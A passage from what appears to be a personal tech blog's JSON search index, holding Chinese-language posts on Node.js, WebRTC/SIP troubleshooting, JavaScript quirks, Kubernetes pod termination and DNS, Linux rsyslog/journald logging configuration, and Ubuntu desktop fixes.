require(\u0026#39;path\u0026#39;) const file = fs.readFileSync(path.join(__dirname, \u0026#39;./a.wav\u0026#39;)) console.log(file) 原始的打印,二进制以16进制的方式显示。看不出其中有何含义。\nnode main.js \u0026lt;Buffer 52 49 46 46 a4 23 48 00 57 41 56 45 66 6d 74 20 10 00 00 00 01 00 02 00 40 1f 00 00 00 7d 00 00 04 00 10 00 64 61 74 61 80 23 48 00 00 00 00 00 00 00 .","title":"Node.js读取wav文件"},{"content":"什么是回铃音? 回铃音的特点\n回铃音是由运营商送给手机的,而不是由被叫送给主叫的。 回铃音的播放阶段是在被叫接听前播放,被叫一旦接听,回铃音则播放结束 回铃音一般是450Hz, 嘟一秒,停4秒,5秒一个周期 回铃音分为三种\n舒适噪音阶段:就是嘟一秒,停4秒的阶段 彩铃阶段:有的手机,在接听之前,会向主叫方播放个性化的语音,例如放点流行音乐之类的 定制回音阶段:例如被叫放立即把电话给拒绝了,但是主叫放这边并没有挂电话,而是在播放:对不起,您拨打的电话无人接听,请稍后再播 问题现象 WebRTC拨打出去之后,在客户接听之前,听不到任何回铃音。在客户接听之后,可以短暂的听到一点点回铃音。 问题排查思路 服务端问题 客户端问题 网络问题 网络架构 首先根据网络架构图,我决定在a点和b点进行抓包 抓包之后用wireshark进行分析。得出以下结论\nsip服务器AB之间用的是g711编码,语音流没有加密。从b点抓的包,能够从中提取出SIP服务器B向sip服务器A发送的语音流,可以听到回铃音。说明SIP服务器A是收到了回铃音的。 ab两点之间的WebRTC语音流是加密的,无法分析出其中是否含有语音流。 虽然无法提取出WebRTC语音流。但是通过wireshark Statistics -\u0026gt; Conversation 分析,得出结论:在电话接通之前,a点收到的udp包和从b点发出的udp包的数量是是一致的。说明webrtc客户端实际上是收到了语音流。只不过客户端没有播放。然后问题定位到客户端的js库。 通过分析客户端库的代码,定位到具体代码的位置。解决问题,并向开源库提交了修复bug的的pull request。实际上只是修改了一行代码。https://github.com/versatica/JsSIP/pull/669 问题总结 解决问题看似很简单,但是需要的很强的问题分析能力,并且对网络协议,网络架构,wireshark抓包分析都要精通,才能真正的看到深层次的东西。\n","permalink":"https://wdd.js.org/fe/webrtc-has-no-earlymedia/","summary":"什么是回铃音? 回铃音的特点\n回铃音是由运营商送给手机的,而不是由被叫送给主叫的。 回铃音的播放阶段是在被叫接听前播放,被叫一旦接听,回铃音则播放结束 回铃音一般是450Hz, 嘟一秒,停4秒,5秒一个周期 回铃音分为三种\n舒适噪音阶段:就是嘟一秒,停4秒的阶段 彩铃阶段:有的手机,在接听之前,会向主叫方播放个性化的语音,例如放点流行音乐之类的 定制回音阶段:例如被叫放立即把电话给拒绝了,但是主叫放这边并没有挂电话,而是在播放:对不起,您拨打的电话无人接听,请稍后再播 问题现象 WebRTC拨打出去之后,在客户接听之前,听不到任何回铃音。在客户接听之后,可以短暂的听到一点点回铃音。 问题排查思路 服务端问题 客户端问题 网络问题 网络架构 首先根据网络架构图,我决定在a点和b点进行抓包 抓包之后用wireshark进行分析。得出以下结论\nsip服务器AB之间用的是g711编码,语音流没有加密。从b点抓的包,能够从中提取出SIP服务器B向sip服务器A发送的语音流,可以听到回铃音。说明SIP服务器A是收到了回铃音的。 ab两点之间的WebRTC语音流是加密的,无法分析出其中是否含有语音流。 虽然无法提取出WebRTC语音流。但是通过wireshark Statistics -\u0026gt; Conversation 分析,得出结论:在电话接通之前,a点收到的udp包和从b点发出的udp包的数量是是一致的。说明webrtc客户端实际上是收到了语音流。只不过客户端没有播放。然后问题定位到客户端的js库。 通过分析客户端库的代码,定位到具体代码的位置。解决问题,并向开源库提交了修复bug的的pull request。实际上只是修改了一行代码。https://github.com/versatica/JsSIP/pull/669 问题总结 解决问题看似很简单,但是需要的很强的问题分析能力,并且对网络协议,网络架构,wireshark抓包分析都要精通,才能真正的看到深层次的东西。","title":"记一次WebRTC无回铃音问题排查"},{"content":"在PC端,使用WebRTC通话一般都会使用耳麦,如果耳麦有问题,可能就会报这个错。 所以最好多换几个耳麦,试试。\n","permalink":"https://wdd.js.org/fe/webrtc-domexception/","summary":"在PC端,使用WebRTC通话一般都会使用耳麦,如果耳麦有问题,可能就会报这个错。 所以最好多换几个耳麦,试试。","title":"WebRTC getUserMedia DOMException Requested Device not found"},{"content":"client.onConnect = function (frame) { console.log(\u0026#39;onConnect\u0026#39;, frame) client.subscribe(\u0026#39;/topic/event.agent.*.abc_cc\u0026#39;, function (msg) { console.log(msg) }, { id: \u0026#39;wdd\u0026#39;, \u0026#39;x-queue-name\u0026#39;: \u0026#39;wdd-queue\u0026#39; }) } 在mq管理端:\nOptional Arguments Optional queue arguments, also known as \u0026ldquo;x-arguments\u0026rdquo; because of their field name in the AMQP 0-9-1 protocol, is a map (dictionary) of arbitrary key/value pairs that can be provided by clients when a queue is declared. -https://www.rabbitmq.com/queues.html\n","permalink":"https://wdd.js.org/fe/stompjs-set-queue-name/","summary":"client.onConnect = function (frame) { console.log(\u0026#39;onConnect\u0026#39;, frame) client.subscribe(\u0026#39;/topic/event.agent.*.abc_cc\u0026#39;, function (msg) { console.log(msg) }, { id: \u0026#39;wdd\u0026#39;, \u0026#39;x-queue-name\u0026#39;: \u0026#39;wdd-queue\u0026#39; }) } 在mq管理端:\nOptional Arguments Optional queue arguments, also known as \u0026ldquo;x-arguments\u0026rdquo; because of their field name in the AMQP 0-9-1 protocol, is a map (dictionary) of arbitrary key/value pairs that can be provided by clients when a queue is declared. -https://www.rabbitmq.com/queues.html","title":"stompjs 使用x-queue-name指定队列名"},{"content":"最近看了一篇文章,里面提出一个问题?\nparseInt(0.0000005)为什么等于5?\n最终也给出了解释,parseInt的第一个参数,如果不是字符串的话, 将会调用ToString方法,将其转为字符串。\nstring The value to parse. If this argument is not a string, then it is converted to one using theToStringabstract operation. Leadingwhitespacein this argument is ignored. MDN\n我们在console面板上直接输入0.0000005回车之后发现是5e-7。我们使用toSting()方法转换之后发现是字符串5e7\n字符串5e-7转成整数5是没什么疑问的,问题在于为什么0.0000005转成5e-7。而如果少一个零,就可以看到console会原样输出。\n数值类型如何转字符串? 对于数值类型,是使用Number.toString()方法转换的。\nNumber.toString(x)的算法分析 这个算法并没有像我们想象的那么简单。\n先说一些简单场景\n简单场景 Number.toString(x) 如果x是NaN, 返回\u0026quot;NaN\u0026quot; 如果x是+0或者-0, 返回\u0026quot;0\u0026quot; 如果x是负数返回, 返回Number.toString(-x) 如果x是正无穷,返回\u0026quot;Infinity\u0026quot; 复杂场景 可以看出,0.0000005并不在简单场景中。下面就进入到复杂场景了。\n会用到一个公式\nk,s,n都是整数 k大于等于1 10的k-1次方小于等于s, 且s小于等于10的k次方 10的n-k次方属于实数 0.0000005可以表示为5*10的-7次方。代入上面的公式,可以算出: k=1, s=5, n=-6。\n参考 https://dmitripavlutin.com/parseint-mystery-javascript/ https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/parseInt https://tc39.es/ecma262/#sec-numeric-types-number-tostring ","permalink":"https://wdd.js.org/fe/parseint-with-little-number/","summary":"最近看了一篇文章,里面提出一个问题?\nparseInt(0.0000005)为什么等于5?\n最终也给出了解释,parseInt的第一个参数,如果不是字符串的话, 将会调用ToString方法,将其转为字符串。\nstring The value to parse. If this argument is not a string, then it is converted to one using theToStringabstract operation. Leadingwhitespacein this argument is ignored. MDN\n我们在console面板上直接输入0.0000005回车之后发现是5e-7。我们使用toSting()方法转换之后发现是字符串5e7\n字符串5e-7转成整数5是没什么疑问的,问题在于为什么0.0000005转成5e-7。而如果少一个零,就可以看到console会原样输出。\n数值类型如何转字符串? 对于数值类型,是使用Number.toString()方法转换的。\nNumber.toString(x)的算法分析 这个算法并没有像我们想象的那么简单。\n先说一些简单场景\n简单场景 Number.toString(x) 如果x是NaN, 返回\u0026quot;NaN\u0026quot; 如果x是+0或者-0, 返回\u0026quot;0\u0026quot; 如果x是负数返回, 返回Number.toString(-x) 如果x是正无穷,返回\u0026quot;Infinity\u0026quot; 复杂场景 可以看出,0.0000005并不在简单场景中。下面就进入到复杂场景了。\n会用到一个公式\nk,s,n都是整数 k大于等于1 10的k-1次方小于等于s, 且s小于等于10的k次方 10的n-k次方属于实数 0.0000005可以表示为5*10的-7次方。代入上面的公式,可以算出: k=1, s=5, n=-6。\n参考 https://dmitripavlutin.com/parseint-mystery-javascript/ https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/parseInt https://tc39.es/ecma262/#sec-numeric-types-number-tostring ","title":"parseInt(0.0000005)为什么等于5?"},{"content":"let a = {} let b = Object.create({}) let c = Object.create(null) console.log(a,b,c) 上面三个对象的区别是什么?\n","permalink":"https://wdd.js.org/fe/js-object-create/","summary":"let a = {} let b = Object.create({}) let c = Object.create(null) console.log(a,b,c) 上面三个对象的区别是什么?","title":"{} Object.create({}) Object.create{null}的区别?"},{"content":"通话10多秒后,fs对两个call leg发送bye消息。\nBye消息给的原因是 Reason: Q.850 ;cause=31 ;text=”local, RTP Broken Connection”\n在通话的前10多秒,SIP信令正常,双方也能听到对方的声音。\n首先排查了下fs日志,没发现什么异常。然后根据这个报错内容,在网上搜了下。\n发现了这篇文章 https://www.wavecoreit.com/blog/serverconfig/call-drop-transfer-rtp-broken-connection/\n这篇文章给出的解决办法是通过配置了奥科AudioCodes网关来解决的。\n然后咨询了下客户,证实他们用的也是奥科网关。所以就参考教程,配制了一下。\n主要是在两个地方进行配置\nClick Setup -\u0026gt; Signaling\u0026amp;Media -\u0026gt; Expand Coders \u0026amp; Profiles -\u0026gt; Click IP Profiles -\u0026gt; Edityour SFB Profile -\u0026gt; Broken Connection Mode-\u0026gt; Select Ignore -\u0026gt; Click Apply\nExpand SIP Definitions -\u0026gt; Click SIP Definitions General Settings -\u0026gt; Broken Connection Mode -\u0026gt; Select Ignore -\u0026gt; Click Apply -\u0026gt; Click Save\n这两个地方,都是配置Broken Connection Mode,选择ignore来设置的。\n关于RTP的connection mode,有时间再研究下。\n","permalink":"https://wdd.js.org/opensips/ch7/rtp-broken-connection/","summary":"通话10多秒后,fs对两个call leg发送bye消息。\nBye消息给的原因是 Reason: Q.850 ;cause=31 ;text=”local, RTP Broken Connection”\n在通话的前10多秒,SIP信令正常,双方也能听到对方的声音。\n首先排查了下fs日志,没发现什么异常。然后根据这个报错内容,在网上搜了下。\n发现了这篇文章 https://www.wavecoreit.com/blog/serverconfig/call-drop-transfer-rtp-broken-connection/\n这篇文章给出的解决办法是通过配置了奥科AudioCodes网关来解决的。\n然后咨询了下客户,证实他们用的也是奥科网关。所以就参考教程,配制了一下。\n主要是在两个地方进行配置\nClick Setup -\u0026gt; Signaling\u0026amp;Media -\u0026gt; Expand Coders \u0026amp; Profiles -\u0026gt; Click IP Profiles -\u0026gt; Edityour SFB Profile -\u0026gt; Broken Connection Mode-\u0026gt; Select Ignore -\u0026gt; Click Apply\nExpand SIP Definitions -\u0026gt; Click SIP Definitions General Settings -\u0026gt; Broken Connection Mode -\u0026gt; Select Ignore -\u0026gt; Click Apply -\u0026gt; Click Save\n这两个地方,都是配置Broken Connection Mode,选择ignore来设置的。\n关于RTP的connection mode,有时间再研究下。","title":"奥科网关 Rtp Broken Connection"},{"content":"原文:https://cloud.google.com/blog/products/gcp/kubernetes-best-practices-terminating-with-grace\nEditor’s note: Today is the fifth installment in a seven-part video and blog series from Google Developer Advocate Sandeep Dinesh on how to get the most out of your Kubernetes environment.\nWhen it comes to distributed systems, handling failure is key. Kubernetes helps with this by utilizing controllers that can watch the state of your system and restart services that have stopped performing. On the other hand, Kubernetes can often forcibly terminate your application as part of the normal operation of the system.\nIn this episode of “Kubernetes Best Practices,” let’s take a look at how you can help Kubernetes do its job more efficiently and reduce the downtime your applications experience.\nIn the pre-container world, most applications ran on VMs or physical machines. If an application crashed, it took quite a while to boot up a replacement. If you only had one or two machines to run the application, this kind of time-to-recovery was unacceptable.\nInstead, it became common to use process-level monitoring to restart applications when they crashed. If the application crashed, the monitoring process could capture the exit code and instantly restart the application.\nWith the advent of systems like Kubernetes, process monitoring systems are no longer necessary, as Kubernetes handles restarting crashed applications itself. Kubernetes uses an event loop to make sure that resources such as containers and nodes are healthy. This means you no longer need to manually run these monitoring processes. If a resource fails a health check, Kubernetes automatically spins up a replacement.\nThe Kubernetes termination lifecycle Kubernetes does a lot more than monitor your application for crashes. It can create more copies of your application to run on multiple machines, update your application, and even run multiple versions of your application at the same time! This means there are many reasons why Kubernetes might terminate a perfectly healthy container. If you update your deployment with a rolling update, Kubernetes slowly terminates old pods while spinning up new ones. If you drain a node, Kubernetes terminates all pods on that node. If a node runs out of resources, Kubernetes terminates pods to free those resources (check out this previous post to learn more about resources).\nIt’s important that your application handle termination gracefully so that there is minimal impact on the end user and the time-to-recovery is as fast as possible!\nIn practice, this means your application needs to handle the SIGTERM message and begin shutting down when it receives it. This means saving all data that needs to be saved, closing down network connections, finishing any work that is left, and other similar tasks.\nOnce Kubernetes has decided to terminate your pod, a series of events takes place. Let’s look at each step of the Kubernetes termination lifecycle.\n1 - Pod is set to the “Terminating” State and removed from the endpoints list of all Services At this point, the pod stops getting new traffic. Containers running in the pod will not be affected. 2 - preStop Hook is executed The preStop Hook is a special command or http request that is sent to the containers in the pod. If your application doesn’t gracefully shut down when receiving a SIGTERM you can use this hook to trigger a graceful shutdown. Most programs gracefully shut down when receiving a SIGTERM, but if you are using third-party code or are managing a system you don’t have control over, the preStop hook is a great way to trigger a graceful shutdown without modifying the application.\n3 - SIGTERM signal is sent to the pod At this point, Kubernetes will send a SIGTERM signal to the containers in the pod. This signal lets the containers know that they are going to be shut down soon. Your code should listen for this event and start shutting down cleanly at this point. This may include stopping any long-lived connections (like a database connection or WebSocket stream), saving the current state, or anything like that.\nEven if you are using the preStop hook, it is important that you test what happens to your application if you send it a SIGTERM signal, so you are not surprised in production!\n4 - Kubernetes waits for a grace period At this point, Kubernetes waits for a specified time called the termination grace period. By default, this is 30 seconds. It’s important to note that this happens in parallel to the preStop hook and the SIGTERM signal. Kubernetes does not wait for the preStop hook to finish. If your app finishes shutting down and exits before the terminationGracePeriod is done, Kubernetes moves to the next step immediately.\nIf your pod usually takes longer than 30 seconds to shut down, make sure you increase the grace period. You can do that by setting the terminationGracePeriodSeconds option in the Pod YAML. For example, to change it to 60 seconds:\n5 - SIGKILL signal is sent to pod, and the pod is removed If the containers are still running after the grace period, they are sent the SIGKILL signal and forcibly removed. At this point, all Kubernetes objects are cleaned up as well.\nConclusion Kubernetes can terminate pods for a variety of reasons, and making sure your application handles these terminations gracefully is core to creating a stable system and providing a great user experience.\nkubectl explain deployment.spec.template.spec KIND: Deployment VERSION: apps/v1 FIELD: terminationGracePeriodSeconds \u0026lt;integer\u0026gt; DESCRIPTION: Optional duration in seconds the pod needs to terminate gracefully. May be decreased in delete request. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period will be used instead. The grace period is the duration in seconds after the processes running in the pod are sent a termination signal and the time when the processes are forcibly halted with a kill signal. Set this value longer than the expected cleanup time for your process. Defaults to 30 seconds. 1. 参考 https://stackoverflow.com/questions/35453792/pods-stuck-in-terminating-status ","permalink":"https://wdd.js.org/container/terminating-with-grace/","summary":"原文:https://cloud.google.com/blog/products/gcp/kubernetes-best-practices-terminating-with-grace\nEditor’s note: Today is the fifth installment in a seven-part video and blog series from Google Developer Advocate Sandeep Dinesh on how to get the most out of your Kubernetes environment.\nWhen it comes to distributed systems, handling failure is key. Kubernetes helps with this by utilizing controllers that can watch the state of your system and restart services that have stopped performing. On the other hand, Kubernetes can often forcibly terminate your application as part of the normal operation of the system.","title":"优雅停止的pod"},{"content":"1. 同一个Node上的pod网段相同 kube-node1 pod1: 172.16.30.8 pod2: 172.16.30.9 pod3: 172.16.30.23 kube-node2 pod4: 172.18.0.5 pod5: 172.18.0.6 2. pod中service name dns解析 使用nslookup命令去查询service name\n第2行 DNS服务器名 第3行 DNS服务器地址 第5行 目标主机的名称 第6行 目标主机的IP地址 bash-5.0# nslookup security Server:\t10.254.10.20 Address:\t10.254.10.20#53 Name:\tsecurity.test.svc.cluster.local Address: 10.254.63.136 2.1. 问题1: 那么问题来了,为什么我要解析的域名是security, 但是返回的主机名是security.test.svc.cluster.local呢?\nbash-5.0# cat /etc/resolv.conf nameserver 10.254.10.20 search test.svc.cluster.local svc.cluster.local cluster.local options ndots:5 在/etc/resolve.conf中,search选项后有几个值,它的作用是,如果你搜索的主机名中没有点, 那么你输入的名字就会和search选中的名字组合,也就是说。\n你输入的是abc, 那么就会按照如何下的顺序去解析域名\nabc.test.svc.cluster.local abc.svc.cluster.local cluster.local 所以我们看到的dns解析的名字就是abc.test.svc.cluster.local。\n2.2. 问题2: 在resolve.conf中,dns服务器的地址是10.254.10.20,那么这个地址运行的是什么呢?\n我们用dns反向解析,将IP解析为域名,可以看到主机的名称为kube-dns.kube-system.svc.cluster.local.\nbash-5.0# nslookup 10.254.10.20 20.10.254.10.in-addr.arpa\tname = kube-dns.kube-system.svc.cluster.local. 而实际上,这个IP地址就是kube-dns的地址。\n[root@kube-m ~]# kubectl get service -n kube-system -o wide NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE SELECTOR kube-dns ClusterIP 10.254.10.20 \u0026lt;none\u0026gt; 53/UDP,53/TCP 15d k8s-app=kube-dns 而k8s-app=kube-dns这个label可以选中coredns\n[root@kube-m ~]# kubectl get pod -l k8s-app=kube-dns -nkube-system NAME READY STATUS RESTARTS AGE coredns-79f9c855c5-nrk88 1/1 Running 0 15d coredns-79f9c855c5-x75rq 1/1 Running 0 5h45m ","permalink":"https://wdd.js.org/container/k8s-network/","summary":"1. 同一个Node上的pod网段相同 kube-node1 pod1: 172.16.30.8 pod2: 172.16.30.9 pod3: 172.16.30.23 kube-node2 pod4: 172.18.0.5 pod5: 172.18.0.6 2. pod中service name dns解析 使用nslookup命令去查询service name\n第2行 DNS服务器名 第3行 DNS服务器地址 第5行 目标主机的名称 第6行 目标主机的IP地址 bash-5.0# nslookup security Server:\t10.254.10.20 Address:\t10.254.10.20#53 Name:\tsecurity.test.svc.cluster.local Address: 10.254.63.136 2.1. 问题1: 那么问题来了,为什么我要解析的域名是security, 但是返回的主机名是security.test.svc.cluster.local呢?\nbash-5.0# cat /etc/resolv.conf nameserver 10.254.10.20 search test.svc.cluster.local svc.cluster.local cluster.local options ndots:5 在/etc/resolve.conf中,search选项后有几个值,它的作用是,如果你搜索的主机名中没有点, 那么你输入的名字就会和search选中的名字组合,也就是说。\n你输入的是abc, 那么就会按照如何下的顺序去解析域名\nabc.test.svc.cluster.local abc.svc.cluster.local cluster.local 所以我们看到的dns解析的名字就是abc.test.svc.cluster.local。\n2.2. 问题2: 在resolve.conf中,dns服务器的地址是10.254.10.20,那么这个地址运行的是什么呢?\n我们用dns反向解析,将IP解析为域名,可以看到主机的名称为kube-dns.kube-system.svc.cluster.local.\nbash-5.0# nslookup 10.254.10.20 20.10.254.10.in-addr.arpa\tname = kube-dns.","title":"K8s pod node网络"},{"content":" 1. 序言 日志文件包含系统的运行信息,包括内核、服务、应用程序等的日志。日志在分析系统故障、排查应用问题等方面,有着至关重要的作用。\n2. 哪些进程负责管理日志? 默认情况下,系统上有两个守护进程服务管理日志。journald和rsyslogd。\njournald是systemd的一个组件,journald的负责收集日志,日志可以来自\nSyslog日志 内核日志 初始化内存日志 启动日志 所有服务写到标准输出和标准错误的日志 journal收集并整理收到的日志,使其易于被使用。\n有以下几点需要注意\n默认情况下,journal的日志是不会持久化的。 journal的日志是二进制的格式,并不能使用文本查看工具,例如cat, 或者vim去分析。journal的日志需要用journalctl命令去读取。 journald会把日志写到一个socket中,rsyslog可以通过这个socket来获取日志,然后去写文件。\n3. 日志文件文件位置 日志文件位置 /var/log/ 目录 4. 日志配置文件位置 /etc/rsyslog.conf rsyslogd配置文件 /etc/logrotate.conf 日志回滚的相关配置 /etc/systemd/journald.conf journald的配置文件 5. rsyslog.conf 5.1. 模块加载 注意 imjournal就是用来负责访问journal中的日志 imuxsock 提供本地日志输入支持,例如使用logger命令输入日志 $ModLoad imuxsock # provides support for local system logging (e.g. via logger command) $ModLoad imjournal # provides access to the systemd journal 5.2. 过滤 5.2.1. 优先级过滤 **模式:FACILITY.**PRIORITY\n设备(FACILITY): kern (0), user (1), mail (2), daemon (3), auth (4), syslog (5), lpr (6), news (7), cron (8), authpriv (9), ftp (10), and local0 through local7 (16 - 23). 日志等级:debug (7), info (6), notice (5), warning (4), err (3), crit (2), alert (1), and emerg (0). 正则 = 指定某个级别 ! 排除某个级别 匹配所有级别 Example: kern.* #选择所有的内核信息 mail.crit #选择所有优先级高于等于crit cron.!info # 选择cron日志不是info级别的日志 5.2.2. 属性过滤 模式::PROPERTY, [!]COMPARE_OPERATION, \u0026ldquo;STRING\u0026rdquo; **\n比较操作符(COMPARE_OPERATION) contains 包含 isequal 相等 starswitch 以xxx开头 regex 正则匹配 ** 举个比较常见的例子.\n如果日志中包含 wdd 这个字符串,就把日志写到/var/log/wdd.log 这个文件里。\n首先编辑一下/etc/rsyslog.conf 文件\n注意 :msg 表示消息的内容 详情可以参考 man rsyslog.conf 关于Available Properties的部分内容\n:msg,contains,\u0026#34;wdd\u0026#34; /var/log/wdd.log 保存退出,然后执行下面的命令:\ntouch /var/log/wdd.log # 创建文件 systemctl restart rsyslog # 重启服务 logger hello wdd ➜ log tail /var/log/wdd.log May 23 19:26:52 VM_0_8_centos root: hello wdd 5.2.3. Action 将rsyslog写日志文件:\n# 方式1:过滤器 日志路径 cron.* /var/log/cron.log # 方式2:过滤器\t-日志路径。注意多了个- # 默认rsyslog是同步写日志,加个-表示异步写日志。在写日志比较多时候,异步的写可以提高性能 mail.* -/var/log/cron.log # 方式3:通过网络发送日志 # @[(zNUMBER)]HOST:[PORT] zNUMBER是压缩等级 mail.* @192.168.2.3:8000 #通过UDP发送日志 cron.* @@192.168.2.3:8000 #通过TCP发送日志, 注意多了一个@ *.* @(2)192.168.2.3:8000 #通过UDP发送日志,日志会被压缩后发送,压缩等级是2。日志如果少于60字节,将不会压缩 5.2.4. 丢弃日志 cron.* stop *.* ~ # rsyslog8 支持用~丢弃日志 详情可以:man rsyslog.conf\n5.2.5. 日志回滚 man lograte 里面有很多日志\n/var/log/wdd.log { noolddir size 10M rotate 10 sharedscripts postrotate /bin/kill -HUP `cat /var/run/syslogd.pid 2\u0026gt; /dev/null` 2\u0026gt; /dev/null || true /bin/kill -HUP `cat /var/run/rsyslogd.pid 2\u0026gt; /dev/null` 2\u0026gt; /dev/null || true endscript } 6. 速度限制 6.1. journald的速度限制 RateLimitInterval 限速周期,默认30s RateLimitBurst 限速值, 默认限速值1000 针对单个service, 在一个限速周期内,如果消息量超过限速值,则丢弃本周期内的所有消息。\n/etc/systemd/journal.conf\n#RateLimitInterval=30s #RateLimitBurst=1000 如果想关闭速度限制,就将RateLimitInterval设置为0\nRateLimitInterval=, RateLimitBurst= Configures the rate limiting that is applied to all messages generated on the system. If, in the time interval defined by RateLimitInterval=, more messages than specified in RateLimitBurst= are logged by a service, all further messages within the interval are dropped until the interval is over. A message about the number of dropped messages is generated. This rate limiting is applied per-service, so that two services which log do not interfere with each other\u0026rsquo;s limits. Defaults to 1000 messages in 30s. The time specification for RateLimitInterval= may be specified in the following units: \u0026ldquo;s\u0026rdquo;, \u0026ldquo;min\u0026rdquo;, \u0026ldquo;h\u0026rdquo;, \u0026ldquo;ms\u0026rdquo;, \u0026ldquo;us\u0026rdquo;. To turn off any kind of rate\nlimiting, set either value to 0.\n6.2. rsyslog的速度限制 /etc/rsyslog.conf\n$SystemLogRateLimitInterval 2 # 单位是s $SystemLogRateLimitBurst 50 如果要关闭速度限制,就将SystemLogRateLimitInterval设置为0\n7. journal 日志清理 \u0026ndash;vacuum-size=, \u0026ndash;vacuum-time= Removes archived journal files until the disk space they use falls below the specified size (specified with the usual \u0026ldquo;K\u0026rdquo;, \u0026ldquo;M\u0026rdquo;, \u0026ldquo;G\u0026rdquo;, \u0026ldquo;T\u0026rdquo;\nsuffixes), or all journal files contain no data older than the specified timespan (specified with the usual \u0026ldquo;s\u0026rdquo;, \u0026ldquo;min\u0026rdquo;, \u0026ldquo;h\u0026rdquo;, \u0026ldquo;days\u0026rdquo;,\n\u0026ldquo;months\u0026rdquo;, \u0026ldquo;weeks\u0026rdquo;, \u0026ldquo;years\u0026rdquo; suffixes). Note that running \u0026ndash;vacuum-size= has only indirect effect on the output shown by \u0026ndash;disk-usage as\nthe latter includes active journal files, while the former only operates on archived journal files. \u0026ndash;vacuum-size= and \u0026ndash;vacuum-time=\nmay be combined in a single invocation to enforce both a size and time limit on the archived journal files.\n发现 /var/log/journal的目录居然有4G。\n所以需要清理。\n7.1. 手动清理 journalctl --vacuum-time=2d # 保留最近两天 journalctl --vacuum-size=500M # 保留最近500MB 按天执行一次试试:\njournalctl --vacuum-time=2d Vacuuming done, freed 3.9G of archived journals on disk. 7.2. 修改配置 为了避免以后还需要手动清理,可以修改/etc/systemd/journal.conf文件\n例如将最大使用改为200M\nSystemMaxUse=200M 重启journald: systemctl restart systemd-journald 8. linux 日志文件简介 inux的日志位于/var/log目录下。\n日志主要分为4类\n1 应用日志 2 事件日志 3 服务日志 4 系统日志 日志内容\n/var/log/messages 普通应用级别活动 /var/log/auth.log 用户验证相关事件 /var/log/secure 系统授权 /var/log/boot.log 系统启动日志 /var/log/dmesg.log 硬件设备相关 /var/log/kern.log 内核日志 /var/log/faillog 失败的登录尝试日志 /var/log/cron crontab计划任务日志 /var/log/yum.log 包安装日志 /var/log/maillog /var/log/mail.log 邮件服务相关日志 /var/log/httpd/ Apache web服务器日志 /var/log/mysql.log /var/log/mysqld.log mysql相关日志 ","permalink":"https://wdd.js.org/posts/2022/10/linux-journal/","summary":"1. 序言 日志文件包含系统的运行信息,包括内核、服务、应用程序等的日志。日志在分析系统故障、排查应用问题等方面,有着至关重要的作用。\n2. 哪些进程负责管理日志? 默认情况下,系统上有两个守护进程服务管理日志。journald和rsyslogd。\njournald是systemd的一个组件,journald的负责收集日志,日志可以来自\nSyslog日志 内核日志 初始化内存日志 启动日志 所有服务写到标准输出和标准错误的日志 journal收集并整理收到的日志,使其易于被使用。\n有以下几点需要注意\n默认情况下,journal的日志是不会持久化的。 journal的日志是二进制的格式,并不能使用文本查看工具,例如cat, 或者vim去分析。journal的日志需要用journalctl命令去读取。 journald会把日志写到一个socket中,rsyslog可以通过这个socket来获取日志,然后去写文件。\n3. 日志文件文件位置 日志文件位置 /var/log/ 目录 4. 日志配置文件位置 /etc/rsyslog.conf rsyslogd配置文件 /etc/logrotate.conf 日志回滚的相关配置 /etc/systemd/journald.conf journald的配置文件 5. rsyslog.conf 5.1. 模块加载 注意 imjournal就是用来负责访问journal中的日志 imuxsock 提供本地日志输入支持,例如使用logger命令输入日志 $ModLoad imuxsock # provides support for local system logging (e.g. via logger command) $ModLoad imjournal # provides access to the systemd journal 5.2. 过滤 5.2.1. 优先级过滤 **模式:FACILITY.**PRIORITY\n设备(FACILITY): kern (0), user (1), mail (2), daemon (3), auth (4), syslog (5), lpr (6), news (7), cron (8), authpriv (9), ftp (10), and local0 through local7 (16 - 23).","title":"Linux 日志系统简述"},{"content":"1. ubuntu wine 微信中文乱码 修改文件 /opt/deepinwine/tools/run.sh /opt/deepinwine/tools/run_v2.sh 将WINE_CMD那行中加入LC_ALL=zh_CN.UTF-8\nWINE_CMD=\u0026#34;LC_ALL=zh_CN.UTF-8 deepin-wine\u0026#34; 参考 https://gitee.com/wszqkzqk/deepin-wine-for-ubuntu\n2. ubuntu 20.04 wine 微信 qq 截图时黑屏 之前截图都是好的的,不知道为什么,今天截图时,点击了微信的截图按钮后,屏幕除了状态栏,都变成黑色的了。\n各种搜索引擎搜了一遍,没有发现解决方案。\n最后决定思考最近对系统做了什么变更,最近我好像给系统安装了新的主题,然后在登录时,选择了新的主题,而没有选择默认的ubuntu主题。\n在登录界面的右下角,有个按钮,点击之后,可以选择主题。\n最近我都是选择其他的主题,没有选择默认的ubuntu主题,然后我就注销之后,重新在登录时选择默认的ubuntu主题后,再次打开微信截图,功能恢复正常。\n所以说,既然选择ubuntu了,就没必要搞些花里胡哨的东西。ubuntu默认的主题挺好看的,而且支持自带主题的设置,就没必要再折腾了。\n3. [open] ubuntu 20.04 锁屏后 解锁屏幕非常慢 super + l可以用来锁屏,锁屏之后屏幕变成黑屏。\n黑屏之后,如果需要唤醒屏幕,可以随便在键盘上按键,去唤醒屏幕。但是这个唤醒的过程感觉很慢,基本上要随便按键接近十几秒,屏幕才能被点亮,网上搜了下,但是没有找到原因。\n但是有个解决办法,就是在黑屏状态下,不要随便输入,而要输入正确的密码,然后按回车键, 这样会快很多。\n也就是说,系统运行正常,可能是显示器的问题。\n4. ubuntu 20.04 xorg 高cpu 桌面卡死 sudo systemctl restart gdm 5. ubuntu 状态栏显示网速 sudo add-apt-repository ppa:fossfreedom/indicator-sysmonitor sudo apt-get install indicator-sysmonitor 在任务启动中选择System Monitor\n在配置中可以选择开机启动\n在高级中可以设置显示哪些列, 我只关系网速,所以只写了{net}\n6. 在命令行查看图片 实际上终端并不能显示图片,而是调用了外部的程序取显示图片。\neog 是 Eye Of Gnome 的缩写, 它其实是个图片查看器。\neog output.png 7. build-requirements: libtool not found. apt-get update apt-get install -y libtool-bin 8. ubuntu下解压zip文件出现中文乱码 相信大家在使用Ubuntu等linux系统时经常会遇到解压压缩文件出现乱码。 zip的处理方式主要有以下两种\n一、unzip 解压时-O指定字符编码\nunzip -O GBK xxxx.zip 注:解压很复杂的中文名文件称如果报错,用引号括起来即可\n二、unar\nunar xxx.zip 注:这种方式要先保证系统中有安装unar,若没有使用如下命令安装: sudo apt-get install unar\n9. 放弃ubuntu的GUI 